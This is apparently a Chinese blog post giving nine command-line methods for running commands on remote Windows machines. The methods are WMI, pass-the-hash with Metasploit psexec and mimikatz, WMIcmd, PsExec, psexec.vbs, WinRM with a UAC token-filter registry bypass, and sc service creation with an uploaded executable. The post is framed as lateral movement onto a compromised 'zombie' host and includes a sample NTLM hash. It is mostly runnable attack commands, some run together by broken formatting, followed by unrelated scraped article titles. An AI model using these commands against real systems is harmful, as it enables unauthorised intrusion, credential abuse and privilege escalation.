一、远程执行命令方式及对应端口:

 IPC$+AT 445 PSEXEC445 WMI135 Winrm5985(HTTP)&5986(HTTPS)

二、9种远程执行cmd命令的方法:

1.WMI执行命令方式,无回显:

wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt"

2.使用Hash直接登录Windows(HASH传递)

抓取windows hash值,得到administrator的hash:

598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

msf调用payload:use exploit/windows/smb/psexec

show optionsset RHOST 192.168.81.129

setSMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BFsetSMBUser Administrator

show optionsrun

3. mimikatz传递hash方式连接+at计划任务执行命令:

mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" //传递hash

dir \\192.168.1.185\c$

4.WMIcmd执行命令,有回显:

WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"

5.Cobalt strkie远程执行命令与hash传递攻击:

6.psexec.exe远程执行命令

psexec /accepteula //接受许可协议

sc delete psexesvc

psexec\\192.168.1.185 -u pt007 -p admin123 cmd.exe

7.psexec.vbs远程执行命令

cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig"

8.winrm远程执行命令

//肉机上面快速启动winrm服务,并绑定到5985端口:

winrm quickconfig -q

winrmset winrm/config/Client @{TrustedHosts="*"}

netstat -ano|find "5985"

//客户端连接方式:

winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd

//UAC问题,修改后,普通管理员登录后也是高权限:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"

9.远程命令执行sc

//建立ipc连接(参见net use + at)后上传等待运行的bat或exe程序到目标系统上,创建服务(开启服务时会以system 权限在远程系统上执行程序):

net use \\192.168.17.138\c$ "admin123" /user:pt007

net use

dir \\192.168.17.138\c$

copy test.exe \\192.168.17.138\c$sc\\192.168.17.138 create test binpath= "c:\test.exe"sc\\192.168.17.138 starttest

sc\\192.168.17.138 del test

java远程执行cmd命令,windows远程执行cmd命令的9种方法相关推荐

  1. 用CMD开启Windows下的服务命令 转载

    用CMD开启Windows下的服务命令   CMD运行指令   开始→运行→CMD→键入以下命令即可:   gpedit.msc-----组策略 sndrec32-------录音机   Nslook ...

  2. cmd调取windows组件的dos命令大全和常用网络工具,及Linux系统下命令大全

    前言 windows与liunx系统,有许多相同,但有些不通的地方,通过一下的比较,可以加深记忆.若在windows下,某个组件不工作,或者网络不通,或许cmd调取windows组件的dos命令大全: ...

  3. [Windows][VC]开机自动启动程序的几种方法

    原文:[Windows][VC]开机自动启动程序的几种方法 很多监控软件要求软件能够在系统重新启动后不用用户去点击图标启动项目,而是直接能够启动运行,方法是写注册表Software\\Microsof ...

  4. php清空dns缓存文件,dns清空-windows刷新本地DNS缓存的几种方法

    windows刷新本地DNS缓存的几种方法 产生原因分析: 1.常有人问到域名解析了不是即时生效的嘛,怎么还是原来的呢?答案就是在本地DNS有解析缓存,电脑第一次访问后,在一定的时间内就将其缓存下来, ...

  5. 远程连接工具VNC与windows远程桌面的使用比较

    提到远程链接工具,就避不开VNC.VNC 是 virtual network connection的简称.VNC免费,并得到了GNU社区的支持,因而粉丝众多.在服务器上装了server,在访问端装上v ...

  6. windows远程桌面linux系统,Windows远程桌面控制Linux图文详解

    随着互联网的高速发展以及Linux企业应用的成熟,Linux被广泛应用于服务器领域,如何实现Linux的远程管理成为网络管理员的首要任务. 我们经常见到的几种最为常用的windows下远程管理Linu ...

  7. mac执行java死卡_MacOS应用程序有时卡死,怎么办?2种方法轻松搞定

    MacOS用起来是很流畅,但不免有时也会出现某个应用程序卡住.卡死的情况,这个时候如果直接使用程序的退出菜单或者按Command + Q快捷键退出程序可能会没有效果,因为程序本身已经不响应了,这个时候 ...

  8. c++ 调用cmd命令行函数 可隐藏黑框 四种方法总结

    在很多情况下,不得不调用cmd命令行,去实现一系列功能,总结靠谱方法两种如下: 方法一:可接受cmd命令行黑框一闪(推荐星数::可传值几乎任何cmd命令) string string getCmdRe ...

  9. linux ssh 远程会话保存,远程SSH会话和流程在断开后运行的5种方法

    SSH或安全Shell简单来说就是一个人可以远程访问其他用户的其他系统,但仅在命令行即非GUI模式的方法. 在更多的技术术语中,当我们ssh到其他用户在某些其他系统上并在该机器上运行命令时,它实际上创 ...

  10. windows运行linux脚本命令,Windows PowerShell:通过命令而不是脚本完成操作

    Windows PowerShell:通过命令而不是脚本完成操作 08/17/2016 本文内容 不要被"编写脚本"这个术语吓倒,因为您可以通过 Windows PowerShel ...

最新文章

  1. Python使用matplotlib可视化时间序列堆叠的面积图、堆叠面积图给出了多个时间序列的贡献程度的可视化表示,以便于相互比较(Stacked Area Chart)
  2. 解读:为何在今年的淘宝造物节上!AR直播火到如此程度?
  3. Nginx虚拟主机、Nginx模块的安装使用(加密模块--with-http_ssl_module)
  4. SharePoint Portal Server 2003 SP2对文档库事件处理程序所带来的影响
  5. mysql frm 恢复_mysql 从 frm 文件恢复 table 表结构的3种方法
  6. ---转载---phython资料
  7. python开发好吗_用Python开发应用好用吗?
  8. TMG自动发现功能配置正常,但客户端却检测不到TMG服务器。
  9. eclipse hibernate mysql_[s2sh]_3_hibernate与mysql还有eclipse的笔记
  10. 在系统编程ISP及在应用编程IAP
  11. 如何使Tello无人机能够通过Python进行条形码扫描?
  12. 地理学中的经典统计分析方法
  13. 毕业四年后的程序员继续租房子
  14. minimax算法及α-β剪枝算法
  15. qq邮箱隐藏代码html,QQ邮箱原来这么好用,4个隐藏设置格调满满
  16. oracle cpu使用率高怎么排查解决,OracleCPU占用率较高的处理方法
  17. 手机计算机打字教程,分享电脑打字熟记技巧,想要学习赶紧来学哦!
  18. c语言怎么快速读出函数作用,读文件fread函数的用法
  19. 拆解药师帮上市:仍处于尴尬境地,究竟动了谁的奶酪?
  20. 【汇正财经顾晨浩】建筑行业,一带一路合作深化

热门文章

  1. upload-labs通关记录
  2. ORB-SLAM2构建稠密地图 ros-kinetic 深度相机
  3. Strom实时热力图展示项目
  4. 一个比较完整的机房建设方案要求
  5. matlab入门总结,MATLAB基础公式小结(一)
  6. 战略机会判断框架:点线面体
  7. [附源码]java毕业设计中学学生学籍管理
  8. 计算机一级excel怎么算分,计算机一级Word和Excel操作自动评分的实现.doc
  9. JDK 11主要特性一览
  10. global global_我们在Global Game Jam 2016上所做的工作